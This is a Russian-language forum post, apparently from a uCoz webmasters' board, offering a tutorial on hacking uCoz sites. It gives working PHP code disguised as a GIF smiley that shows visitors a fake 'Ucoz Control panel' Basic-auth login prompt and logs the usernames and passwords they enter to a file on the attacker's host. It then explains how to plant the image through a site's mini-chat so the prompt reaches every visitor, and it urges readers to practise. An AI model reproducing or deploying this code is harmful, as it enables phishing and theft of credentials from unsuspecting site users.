ZEOS

Ваш IP адрес: 34.227.112.145
Сегодня: 28.03.2024
21:28

SOUL-WORLD

Музыка, Фильмы, Игры, Программы, Шаблоны, Скрипты,уроки фотошоп, Всё для веб мастера и многое другое....
RSS Контакты Главная
[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
  • Страница 1 из 1
  • 1
Модератор форума: Jonny666  
Форум » WebMasteram » Общие вопросы Ucoz » Хочю поделится с вами статьёй как можна взломать сайт на юко
Хочю поделится с вами статьёй как можна взломать сайт на юко
У вас  Дата: Воскресенье, 05.06.2011, 12:08 | Сообщение # 1

Кира







         Пол: Мужчина
         Сообщений: 74
         Репутация: 138
         Статус: Offline

Взлом сайта на UCOZ

Привет. Сегодня я расскажу один из способов взлома сайтов на юкозе. Настоящий хакер может найти достаточно много уязвимостей на таких сайтах и знает много способов их взлома. Я надеюсь что скоро тоже буду таким=).

Итак, начнем...
Для начала нажно зарегистировать хост с поддержкой php (например http://mysite.phphost.net ) . После регистрации льем на фтп скрипт и ставим права на пустой .txt файл, например : passwords.txt (сюда будут присылаться пассы пользователей похаканного сайта), и на файл smile.gif. Также скачайте любой смайлик в расширении .gif (типа cool.gif).
Затем откройте блокнот, да простой блокнот и напишите следующее:

Code
<? <br> header("Content-type: image/gif"); <br> $image = imagecreatefromgif('cool.gif'); <br> if(!$_COOKIE['LOGON']) <br> { <br> $login = $_SERVER['PHP_AUTH_USER']; <br> $pass = $_SERVER['PHP_AUTH_PW']; <br> if(strlen($pass) <= 4 || !$login) <br> { <br> Header('HTTP/1.1 401 Unauthorized'); <br> Header('WWW-Authenticate: Basic realm="Ucoz Control panel"'); <br> } <br> elseif($login) <br> { <br> setcookie('LOGON',md5($pass)); <br> $f = fopen('passwords.txt', 'ab'); <br> fwrite($f, $login." ||| ".$pass."\r\n"); <br> fclose($f); <br> } <br> } <br> imagegif($image); <br> imagedestroy($image); <br> ?>

Как только вы напишите всё - сохраните файл под названием smile, потом поменяйте расширение на gif.
Теперь выбирайте любой юкозовский сайт, например http://target.ucoz.ru/ слева юкозовских сайтов как обычно, у большинства есть мини-чат справа. Так вот - для начала зарегистируйтесь на сайте, потом в мини чате напишите логин, а в содержании сообщения напишите следующее:



И нажмите ОК. Если после этого в миничате вместо сообщения появился смайлик - значит радуйтесь, т.к. сайт - уязвимый. После этого у всех кто будет заходить на данную страницу, (в этом примере это http://target.ucoz.ru/ ) будет появлятся форма в которую нужно будет ввести логин и пароль. У вас при входе на сайт такая форма будет появлятся тоже. И все, введеные логины и пароли в эту форму будут отсылатся в пустой файл passwords.txt, который вы создали в самом начале и залили на фтп.

Удачи! Практикуйтесь. Только на некоторых сайтах эта уязвимость может и не пройти. Но стандрартно созданный юкозовский сайт без доп. своих настроек будет уязвим. Всем спасибо за просмотр, надеюсь статья вам поможет =)))

Особое спасибо нашему порталу hackzone.ru за то, что он такой хороший ))). А также всем участникам хакзоны которые мне помогали во всем, советовали мне нужные вещи и помогают по сей день.
 
Форум » WebMasteram » Общие вопросы Ucoz » Хочю поделится с вами статьёй как можна взломать сайт на юко
  • Страница 1 из 1
  • 1
Поиск: